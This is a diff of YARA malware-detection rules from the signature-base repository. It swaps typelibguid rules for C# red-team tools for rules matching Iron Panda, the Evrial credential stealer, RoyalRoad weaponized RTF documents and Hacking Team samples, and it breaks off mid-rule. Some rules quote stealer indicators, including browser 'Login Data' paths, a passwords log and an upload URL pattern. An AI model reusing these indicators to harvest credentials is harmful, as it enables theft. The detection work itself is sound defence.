-		$typelibguid0lo = "fe9fdde5-3f38-4f14-8c64-c3328c215cf2" ascii wide
-		$typelibguid0up = "FE9FDDE5-3F38-4F14-8C64-C3328C215CF2" ascii wide
+		$s0 = "PluginDeflater.exe" fullword wide
+		$s1 = ".Deflated" fullword wide
+		$s2 = "PluginDeflater" fullword ascii
+		$s3 = "DeflateStream" fullword ascii
+		$s4 = "CompressionMode" fullword ascii
+		$s5 = "System.IO.Compression" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint16( 0 ) == 0x5a4d and filesize < 10KB and all of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpedrchecker : FILE
+rule SIGNATURE_BASE_Ironpanda_Malware4 : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "f7ff344e-f8ee-5c3a-bdd1-de3cae8e7dfb"
-		date = "2020-12-18"
-		modified = "2023-04-06"
-		reference = "https://github.com/PwnDexter/SharpEDRChecker"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L2565-L2579"
+		description = "Iron Panda Malware"
+		author = "Florian Roth (Nextron Systems)"
+		id = "0a72c1e1-b442-52d4-af52-b863abe5ba3c"
+		date = "2015-09-16"
+		modified = "2023-12-05"
+		reference = "https://goo.gl/E4qia9"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_irontiger.yar#L143-L159"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "9da3ff753db6358029f1fdcb100bf6173d142096557c170ddcb3ac9b8c80b310"
+		hash = "0d6da946026154416f49df2283252d01ecfb0c41c27ef3bc79029483adc2240c"
+		logic_hash = "12661c8862eeb82d55a3912e0a499beb6bb19f7abe9ccfe6fa0506e6a032cfe4"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "bdfee233-3fed-42e5-aa64-492eb2ac7047" ascii wide
-		$typelibguid0up = "BDFEE233-3FED-42E5-AA64-492EB2AC7047" ascii wide
+		$s0 = "TestPlugin.dll" fullword wide
+		$s1 = "<a href='http://www.baidu.com'>aasd</a>" fullword wide
+		$s2 = "Zcg.Test.AspxSpyPlugins" fullword ascii
+		$s6 = "TestPlugin" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint16( 0 ) == 0x5a4d and filesize < 10KB and all of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpcliphistory : FILE
+rule SIGNATURE_BASE_MAL_Envrial_Jan18_1 : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "89ca4717-a4ec-5371-8dc3-bdb9933384af"
-		date = "2020-12-21"
-		modified = "2023-04-06"
-		reference = "https://github.com/FSecureLABS/SharpClipHistory"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L2581-L2595"
+		description = "Detects Encrial credential stealer malware"
+		author = "Florian Roth (Nextron Systems)"
+		id = "8be5f0d8-013f-5070-9e19-9ac522c88693"
+		date = "2018-01-21"
+		modified = "2023-12-05"
+		reference = "https://twitter.com/malwrhunterteam/status/953313514629853184"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_envrial.yar#L11-L40"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "5c88179f7b32cc4300f7ed85472247f91d812e523d07f4a11dc4e4b34344be1d"
+		logic_hash = "f047bedaac4dd934657b282a2587c55f3087a7cceb1a80becf14e7db3c365e8b"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85"
+		hash2 = "9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d"
 
 	strings:
-		$typelibguid0lo = "1126d5b4-efc7-4b33-a594-b963f107fe82" ascii wide
-		$typelibguid0up = "1126D5B4-EFC7-4B33-A594-B963F107FE82" ascii wide
+		$x1 = "/Evrial/master/domen" wide
+		$a1 = "\\Opera Software\\Opera Stable\\Login Data" wide
+		$a2 = "\\Comodo\\Dragon\\User Data\\Default\\Login Data" wide
+		$a3 = "\\Google\\Chrome\\User Data\\Default\\Login Data" wide
+		$a4 = "\\Orbitum\\User Data\\Default\\Login Data" wide
+		$a5 = "\\Kometa\\User Data\\Default\\Login Data" wide
+		$s1 = "dlhosta.exe" fullword wide
+		$s2 = "\\passwords.log" wide
+		$s3 = "{{ <>h__TransparentIdentifier1 = {0}, Password = {1} }}" fullword wide
+		$s4 = "files/upload.php?user={0}&hwid={1}" fullword wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint16( 0 ) == 0x5a4d and filesize < 900KB and ( 1 of ( $x* ) or 3 of them or 2 of ( $s* ) )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpgpo_Remoteaccesspolicies : FILE
+rule SIGNATURE_BASE_Royalroad_Code_Pattern1 : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "642c2672-2327-5a4a-af91-6e0559996908"
-		date = "2020-12-21"
-		modified = "2023-04-06"
-		reference = "https://github.com/FSecureLABS/SharpGPO-RemoteAccessPolicies"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L2597-L2611"
+		description = "Detects RoyalRoad weaponized RTF documents"
+		author = "nao_sec"
+		id = "db2fb24c-df99-5622-ac3d-d31c34481984"
+		date = "2020-01-15"
+		modified = "2023-12-05"
+		reference = "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_8_koike-nakajima_jp.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_royalroad.yar#L25-L40"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "7d6f74ef8d34603502b26b60a1042dd531891088b9455f068bccaabaf12232b1"
-		score = 75
+		logic_hash = "ebd507d95c454562fa0b364072120b35b1bf8dd2be129a419d893f6708ab9cca"
+		score = 80
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "fbb1abcf-2b06-47a0-9311-17ba3d0f2a50" ascii wide
-		$typelibguid0up = "FBB1ABCF-2B06-47A0-9311-17BA3D0F2A50" ascii wide
+		$S1 = "48905d006c9c5b0000000000030101030a0a01085a5ab844eb7112ba7856341231"
+		$RTF = "{\\rt"
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		$RTF at 0 and $S1
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Absinthe : FILE
+rule SIGNATURE_BASE_Royalroad_Code_Pattern2 : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "8f25593b-b9d2-5807-b299-b039ecfd43a5"
-		date = "2020-12-21"
-		modified = "2023-04-06"
-		reference = "https://github.com/cameronhotchkies/Absinthe"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L2613-L2627"
+		description = "Detects RoyalRoad weaponized RTF documents"
+		author = "nao_sec"
+		id = "135024ae-9ecf-5691-95ca-96002e500fd5"
+		date = "2020-01-15"
+		modified = "2023-12-05"
+		reference = "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_8_koike-nakajima_jp.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_royalroad.yar#L42-L57"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "f6736024464a7b7115f8b66ff985a47107cbdd7d6260e56586ade467b3ca6c2a"
-		score = 75
+		logic_hash = "e252868042e5150d99de2c2f4642f3d91d764d5a062f3a8de9ab316e299e00ac"
+		score = 80
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "9936ae73-fb4e-4c5e-a5fb-f8aaeb3b9bd6" ascii wide
-		$typelibguid0up = "9936AE73-FB4E-4C5E-A5FB-F8AAEB3B9BD6" ascii wide
+		$S1 = "653037396132353234666136336135356662636665" ascii
+		$RTF = "{\\rt"
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		$RTF at 0 and $S1
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Exploitremotingservice : FILE
+rule SIGNATURE_BASE_Royalroad_Code_Pattern3 : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "2f0b9635-2b2e-5825-baeb-69d7ae3791b1"
-		date = "2020-12-21"
-		modified = "2023-04-06"
-		reference = "https://github.com/tyranid/ExploitRemotingService"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L2629-L2647"
+		description = "Detects RoyalRoad weaponized RTF documents"
+		author = "nao_sec"
+		id = "7bce2fe6-a921-51ec-8b5f-5d7f55ab3864"
+		date = "2020-01-15"
+		modified = "2023-12-05"
+		reference = "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_8_koike-nakajima_jp.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_royalroad.yar#L59-L75"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "08871e9edc8184ee487080a9d99735598a9f03e605db0a38e83f60a3cc15cbbe"
-		score = 75
+		logic_hash = "3b5d9872eb86d1a220e5b70c560e7054bee8b2bc1fa2a75781d87616674e2927"
+		score = 80
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "fd17ae38-2fd3-405f-b85b-e9d14e8e8261" ascii wide
-		$typelibguid0up = "FD17AE38-2FD3-405F-B85B-E9D14E8E8261" ascii wide
-		$typelibguid1lo = "1850b9bb-4a23-4d74-96b8-58f274674566" ascii wide
-		$typelibguid1up = "1850B9BB-4A23-4D74-96B8-58F274674566" ascii wide
-		$typelibguid2lo = "297cbca1-efa3-4f2a-8d5f-e1faf02ba587" ascii wide
-		$typelibguid2up = "297CBCA1-EFA3-4F2A-8D5F-E1FAF02BA587" ascii wide
+		$S1 = "4746424151515151505050500000000000584242eb0642424235353336204460606060606060606061616161616161616161616161616161"
+		$RTF = "{\\rt"
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		$RTF at 0 and $S1
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Xploit : FILE
+rule SIGNATURE_BASE_Royalroad_Code_Pattern4Ab : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "11ba6c14-06b6-5d9f-ac69-08ae506877e7"
-		date = "2020-12-21"
-		modified = "2023-04-06"
-		reference = "https://github.com/shargon/Xploit"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L2649-L2683"
+		description = "Detects RoyalRoad weaponized RTF documents"
+		author = "nao_sec"
+		id = "b4926888-b576-59f7-932a-03b9326845da"
+		date = "2020-01-15"
+		modified = "2023-12-05"
+		reference = "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_8_koike-nakajima_jp.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_royalroad.yar#L77-L92"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "b049d1fe26677b8c1a5bfcb46bfa2b35073f2b4bba02551b490a527df81f145b"
-		score = 75
-		quality = 83
+		logic_hash = "dd9468b3208a27b6f3b56037013f06c4d2adbd201a12df141bc980ad595a75c0"
+		score = 80
+		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "4545cfde-9ee5-4f1b-b966-d128af0b9a6e" ascii wide
-		$typelibguid0up = "4545CFDE-9EE5-4F1B-B966-D128AF0B9A6E" ascii wide
-		$typelibguid1lo = "33849d2b-3be8-41e8-a1e2-614c94c4533c" ascii wide
-		$typelibguid1up = "33849D2B-3BE8-41E8-A1E2-614C94C4533C" ascii wide
-		$typelibguid2lo = "c2dc73cc-a959-4965-8499-a9e1720e594b" ascii wide
-		$typelibguid2up = "C2DC73CC-A959-4965-8499-A9E1720E594B" ascii wide
-		$typelibguid3lo = "77059fa1-4b7d-4406-bc1a-cb261086f915" ascii wide
-		$typelibguid3up = "77059FA1-4B7D-4406-BC1A-CB261086F915" ascii wide
-		$typelibguid4lo = "a4a04c4d-5490-4309-9c90-351e5e5fd6d1" ascii wide
-		$typelibguid4up = "A4A04C4D-5490-4309-9C90-351E5E5FD6D1" ascii wide
-		$typelibguid5lo = "ca64f918-3296-4b7d-9ce6-b98389896765" ascii wide
-		$typelibguid5up = "CA64F918-3296-4B7D-9CE6-B98389896765" ascii wide
-		$typelibguid6lo = "10fe32a0-d791-47b2-8530-0b19d91434f7" ascii wide
-		$typelibguid6up = "10FE32A0-D791-47B2-8530-0B19D91434F7" ascii wide
-		$typelibguid7lo = "679bba57-3063-4f17-b491-4f0a730d6b02" ascii wide
-		$typelibguid7up = "679BBA57-3063-4F17-B491-4F0A730D6B02" ascii wide
-		$typelibguid8lo = "0981e164-5930-4ba0-983c-1cf679e5033f" ascii wide
-		$typelibguid8up = "0981E164-5930-4BA0-983C-1CF679E5033F" ascii wide
-		$typelibguid9lo = "2a844ca2-5d6c-45b5-963b-7dca1140e16f" ascii wide
-		$typelibguid9up = "2A844CA2-5D6C-45B5-963B-7DCA1140E16F" ascii wide
-		$typelibguid10lo = "7d75ca11-8745-4382-b3eb-c41416dbc48c" ascii wide
-		$typelibguid10up = "7D75CA11-8745-4382-B3EB-C41416DBC48C" ascii wide
+		$S1 = "4746424151515151505050500000000000584242EB064242423535333620446060606060606060606161616161616}1616161616161616161" ascii
+		$RTF = "{\\rt"
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		$RTF at 0 and $S1
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Poc : FILE
+rule SIGNATURE_BASE_Royalroad_Code_Pattern4Ce : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "5669bc1a-b32e-5ae7-bf94-8ed2a124c765"
-		date = "2020-12-21"
-		modified = "2023-04-06"
-		reference = "https://github.com/thezdi/PoC"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L2685-L2699"
+		description = "Detects RoyalRoad weaponized RTF documents"
+		author = "nao_sec"
+		id = "c6e8a072-23cd-5f6a-9b4f-57d3e4500d13"
+		date = "2020-01-15"
+		modified = "2023-12-05"
+		reference = "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_8_koike-nakajima_jp.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_royalroad.yar#L94-L109"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "938b553912d069969326bc970d94c23749af3ef28a0b5ce2c49d9de54358f9bd"
-		score = 75
+		logic_hash = "7033c5874b406341a68f761b45fd6a9b73a9875c80b14d52a7c2240202c8fb40"
+		score = 80
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "89f9d411-e273-41bb-8711-209fd251ca88" ascii wide
-		$typelibguid0up = "89F9D411-E273-41BB-8711-209FD251CA88" ascii wide
+		$S1 = "584242eb064242423535333620446060606060606060606161616161616161616161616}1616161" ascii
+		$RTF = "{\\rt"
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		$RTF at 0 and $S1
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpgpoabuse : FILE
+rule SIGNATURE_BASE_Royalroad_Code_Pattern4D : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "ea27044f-69be-5db7-8d77-28dafb18c7e5"
-		date = "2020-12-21"
-		modified = "2023-04-06"
-		reference = "https://github.com/FSecureLABS/SharpGPOAbuse"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L2701-L2715"
+		description = "Detects RoyalRoad weaponized RTF documents"
+		author = "nao_sec"
+		id = "1677dfb4-7611-5bef-87d1-4cec6285791f"
+		date = "2020-01-15"
+		modified = "2023-12-05"
+		reference = "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_8_koike-nakajima_jp.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_royalroad.yar#L113-L128"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "e3539bb9bdf7a9986e8fcfc725233363285e1dfe3de254b6979643abfe7944a5"
-		score = 75
+		logic_hash = "9b531063d2a5ae36ae4e708a749dcf2cdc4c85fc43769a8525049e6facfca674"
+		score = 80
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "4f495784-b443-4838-9fa6-9149293af785" ascii wide
-		$typelibguid0up = "4F495784-B443-4838-9FA6-9149293AF785" ascii wide
+		$S1 = "584242eb06424242353533362044606060606060606060616161616161616161616}16161616161" ascii
+		$RTF = "{\\rt"
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		$RTF at 0 and $S1
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Watson : FILE
+rule SIGNATURE_BASE_Royalroad_RTF : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "6dc7bb08-0b34-50a0-8ae8-02d96d66a334"
-		date = "2020-12-21"
-		modified = "2023-04-06"
-		reference = "https://github.com/rasta-mouse/Watson"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L2717-L2731"
+		description = "Detects RoyalRoad weaponized RTF documents"
+		author = "nao_sec"
+		id = "366ec9c3-e6ad-5198-88d5-15aa84a8358f"
+		date = "2020-01-15"
+		modified = "2023-12-05"
+		reference = "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_8_koike-nakajima_jp.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_royalroad.yar#L133-L148"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "cc7134a974b11b677e368f4f01ec534578bcd970282dc2c8b7f4852cb028514a"
-		score = 75
+		logic_hash = "20031fe6d6a0b2fad43f7e04bb82321c2ea75193f23194edead7ca530af8ac55"
+		score = 80
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "49ad5f38-9e37-4967-9e84-fe19c7434ed7" ascii wide
-		$typelibguid0up = "49AD5F38-9E37-4967-9E84-FE19C7434ED7" ascii wide
+		$S1 = "objw2180\\objh300" ascii
+		$RTF = "{\\rt"
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		$RTF at 0 and $S1
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Standin : FILE
+rule SIGNATURE_BASE_Royalroad_RTF_V7 : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "2af3c28a-ce5d-5dea-9abe-ff54b180049e"
-		date = "2020-12-21"
-		modified = "2023-04-06"
-		reference = "https://github.com/FuzzySecurity/StandIn"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L2733-L2747"
+		description = "Detects RoyalRoad weaponized RTF documents"
+		author = "nao_sec"
+		id = "9d2af980-a851-533a-b25d-ee52277e319c"
+		date = "2020-01-15"
+		modified = "2023-12-05"
+		reference = "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_8_koike-nakajima_jp.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_royalroad.yar#L150-L166"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "105be83eb5db667b9f27f2a514e0d04748ca006ef64aa01b9f643c227e7f1639"
-		score = 75
+		logic_hash = "da043123cf72e19295634720196d78bef3af89f44cba795dbbcee4c0f5c8159a"
+		score = 60
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "01c142ba-7af1-48d6-b185-81147a2f7db7" ascii wide
-		$typelibguid0up = "01C142BA-7AF1-48D6-B185-81147A2F7DB7" ascii wide
+		$v7_1 = "{\\object\\objocx{\\objdata" ascii
+		$v7_2 = "ods0000" ascii
+		$RTF = "{\\rt"
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		$RTF at 0 and all of ( $v7* )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Azure_Password_Harvesting : FILE
+rule SIGNATURE_BASE_Royalroad_Encode_In_RTF : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "681cf9da-d664-5402-b7ac-eb2cfad85da9"
-		date = "2020-12-21"
-		modified = "2023-04-06"
-		reference = "https://github.com/guardicore/azure_password_harvesting"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L2749-L2763"
+		description = "Detects RoyalRoad weaponized RTF documents"
+		author = "nao_sec"
+		id = "66614152-8f9b-5e62-b6bd-ba0286e66d4d"
+		date = "2020-01-15"
+		modified = "2023-12-05"
+		reference = "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_8_koike-nakajima_jp.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_royalroad.yar#L168-L189"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "4b42d3318af410952f96ede0959363f33e75ce0644c58c1de85165e0acbbfcdd"
-		score = 75
+		logic_hash = "00a703a0d7b3a74ec9bfc8ad0e570ee04b3cb6b7f2c062cc2886b41f6fbea49d"
+		score = 60
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "7ad1ff2d-32ac-4c54-b615-9bb164160dac" ascii wide
-		$typelibguid0up = "7AD1FF2D-32AC-4C54-B615-9BB164160DAC" ascii wide
+		$enc_hex_1 = "B0747746"
+		$enc_hex_2 = "B2A66DFF"
+		$enc_hex_3 = "F2A32072"
+		$enc_hex_4 = "B2A46EFF"
+		$enc_hex_1l = "b0747746"
+		$enc_hex_2l = "b2a66Dff"
+		$enc_hex_3l = "f2a32072"
+		$enc_hex_4l = "b2a46eff"
+		$RTF = "{\\rt"
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		$RTF at 0 and 1 of ( $enc_hex* )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Powerops : FILE
+rule SIGNATURE_BASE_Bin_Ndisk : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "3ef9f099-13c9-5b6f-8615-232240530078"
-		date = "2020-12-21"
-		modified = "2023-04-06"
-		reference = "https://github.com/fdiskyou/PowerOPS"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L2765-L2779"
+		description = "Hacking Team Disclosure Sample - file ndisk.sys"
+		author = "Florian Roth (Nextron Systems)"
+		id = "f442315e-67c2-55a5-954e-8e7e48aa1243"
+		date = "2015-07-07"
+		modified = "2023-12-05"
+		reference = "https://www.virustotal.com/en/file/a03a6ed90b89945a992a8c69f716ec3c743fa1d958426f4c50378cca5bef0a01/analysis/1436184181/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_hackingteam_rules.yar#L10-L31"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "211a96940c5cbca143471268500be46c13dc58469d2386b2dc7f8ff1f05a2c52"
-		score = 75
+		hash = "cf5089752ba51ae827971272a5b761a4ab0acd84"
+		logic_hash = "d93147e9631065eab35cbbc4ce112cfef92f81063cf8570bc021fbfe72811ab6"
+		score = 100
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "2a3c5921-7442-42c3-8cb9-24f21d0b2414" ascii wide
-		$typelibguid0up = "2A3C5921-7442-42C3-8CB9-24F21D0B2414" ascii wide
+		$s1 = "\\Registry\\Machine\\System\\ControlSet00%d\\services\\ndisk.sys" fullword wide
+		$s2 = "\\Registry\\Machine\\System\\ControlSet00%d\\Enum\\Root\\LEGACY_NDISK.SYS" fullword wide
+		$s3 = "\\Driver\\DeepFrz" wide
+		$s4 = "Microsoft Kernel Disk Manager" fullword wide
+		$s5 = "ndisk.sys" fullword wide
+		$s6 = "\\Device\\MSH4DEV1" wide
+		$s7 = "\\DosDevices\\MSH4DEV1" wide
+		$s8 = "built by: WinDDK" fullword wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint16( 0 ) == 0x5a4d and filesize < 30KB and 6 of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Random_Csharptools : FILE
+rule SIGNATURE_BASE_Hackingteam_Elevator_DLL : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "ad8b5573-ad20-50cd-927b-a6401b10e653"
-		date = "2020-12-21"
-		modified = "2023-04-06"
-		reference = "https://github.com/xorrior/Random-CSharpTools"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L2781-L2807"
+		description = "Hacking Team Disclosure Sample - file elevator.dll"
+		author = "Florian Roth (Nextron Systems)"
+		id = "d479c675-b200-56e3-8976-f70b45ea791e"
+		date = "2015-07-07"
+		modified = "2023-12-05"
+		reference = "http://t.co/EG0qtVcKLh"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_hackingteam_rules.yar#L33-L56"
